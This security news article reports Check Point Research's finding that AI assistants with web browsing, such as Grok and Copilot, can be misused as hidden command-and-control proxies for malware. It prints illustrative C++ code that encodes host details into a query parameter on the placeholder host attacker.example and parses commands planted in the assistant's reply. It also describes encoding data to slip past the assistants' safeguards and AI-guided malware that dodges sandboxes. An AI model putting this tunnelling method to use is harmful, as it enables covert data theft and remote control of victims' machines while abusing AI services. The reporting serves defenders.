AI assistants with web browsing features can be repurposed as covert command-and-control (C2) channels, allowing malicious traffic to blend into routine enterprise communications.
According to new findings from Check Point Research (CPR), platforms including Grok and Microsoft Copilot can be manipulated through their public web interfaces into fetching attacker-controlled URLs and returning the retrieved content.
In effect, the AI service acts as a proxy, relaying commands to infected machines and sending stolen data back out, without requiring an API key or even a registered account.
This approach shifts AI from a development aid for attackers into an operational component of malware itself.
How the Proxy Technique Works
The method relies on AI assistants that support URL fetching and content summarisation. By prompting the assistant to visit a malicious website and summarise its contents, attackers can tunnel encoded data out through query parameters and receive embedded commands back in the AI's reply.
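To make the tunnelling step concrete, the sketch below shows how an implant might pack host data into a single query parameter and wrap the resulting URL in a summarisation prompt. It is illustrative only: CPR has not published its PoC code, so the domain, parameter name and data fields here are hypothetical.

```cpp
#include <iostream>
#include <string>

// URL-safe base64 (RFC 4648, section 5, unpadded), so the encoded data
// can ride inside a query parameter without further escaping.
std::string base64url_encode(const std::string& in) {
    static const char tbl[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_";
    std::string out;
    int val = 0, bits = -6;
    for (unsigned char c : in) {
        val = (val << 8) + c;
        bits += 8;
        while (bits >= 0) {
            out.push_back(tbl[(val >> bits) & 0x3F]);
            bits -= 6;
        }
    }
    if (bits > -6) out.push_back(tbl[((val << 8) >> (bits + 8)) & 0x3F]);
    return out;
}

int main() {
    // Hypothetical host data; CPR described the implant's collection
    // only as "basic system data".
    std::string host_info = "host=WS-042;user=jdoe;os=win10";

    // Tunnel the encoded data through a query parameter on an
    // attacker-controlled page (placeholder domain).
    std::string url =
        "https://attacker.example/report?d=" + base64url_encode(host_info);

    // The prompt handed to the assistant's public web interface.
    std::string prompt = "Please visit " + url + " and summarise its contents.";
    std::cout << prompt << "\n";
    return 0;
}
```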
In a proof-of-concept (PoC), the CPR team set up a benign-looking website and instructed the AI to retrieve specific information from it. The returned output contained commands planted in the site's HTML, which malware could then parse and execute.
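The parsing half might look like the following minimal sketch, assuming the attacker plants a command between recognisable text markers that survive summarisation. The "[[CMD]]" delimiters and the command name are invented for illustration; the markers used in CPR's PoC have not been disclosed.

```cpp
#include <iostream>
#include <string>

// Pull out whatever was planted between two markers in the assistant's
// reply. Returns an empty string if no complete marker pair is found.
std::string extract_command(const std::string& reply) {
    const std::string open = "[[CMD]]";
    const std::string close = "[[/CMD]]";
    size_t start = reply.find(open);
    if (start == std::string::npos) return "";
    start += open.size();
    size_t end = reply.find(close, start);
    if (end == std::string::npos) return "";
    return reply.substr(start, end - start);
}

int main() {
    // Simulated assistant output that echoed marked text from the page.
    std::string reply =
        "The page is a short status report. [[CMD]]send_inventory[[/CMD]]";
    std::cout << "Embedded command: " << extract_command(reply) << "\n";
    return 0;
}
```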
To automate the process, the researchers embedded a WebView2 browser component in a C++ program, allowing the malware to drive the AI's web interface without any visible browser window.
The implant gathered basic system data, appended it to a URL and asked the AI to summarise the page. The AI's response delivered instructions back to the infected host.
Key characteristics of the technique include:
- No authentication or API key required
- Encrypted or encoded data to bypass safeguards
- Traffic disguised as legitimate AI web usage
Toward Adaptive AI-Driven Malware
The research also outlined a broader trend: malware that integrates AI into its runtime decision-making. Rather than relying on fixed logic, an implant could send host information to a model and receive guidance on which actions to prioritise, whether to proceed or remain dormant, and which files to target.
Such AI-driven campaigns could refine reconnaissance, avoid sandbox environments and selectively encrypt or exfiltrate high-value data, reducing noise and lowering the chance of detection. Instead of encrypting 100 GB of files, for example, attackers might focus only on critical assets, shortening execution time to minutes or less.
CPR argued that the technique represents abuse of legitimate AI-enabled web features rather than exploitation of a software flaw.
"As AI continues to integrate into everyday workflows, it will also integrate into attacker workflows," the researchers said.
"Understanding how these systems can be misused today is the first step toward hardening them for the future, and ensuring that AI remains more useful to defenders than to the malware that tries to hide behind it."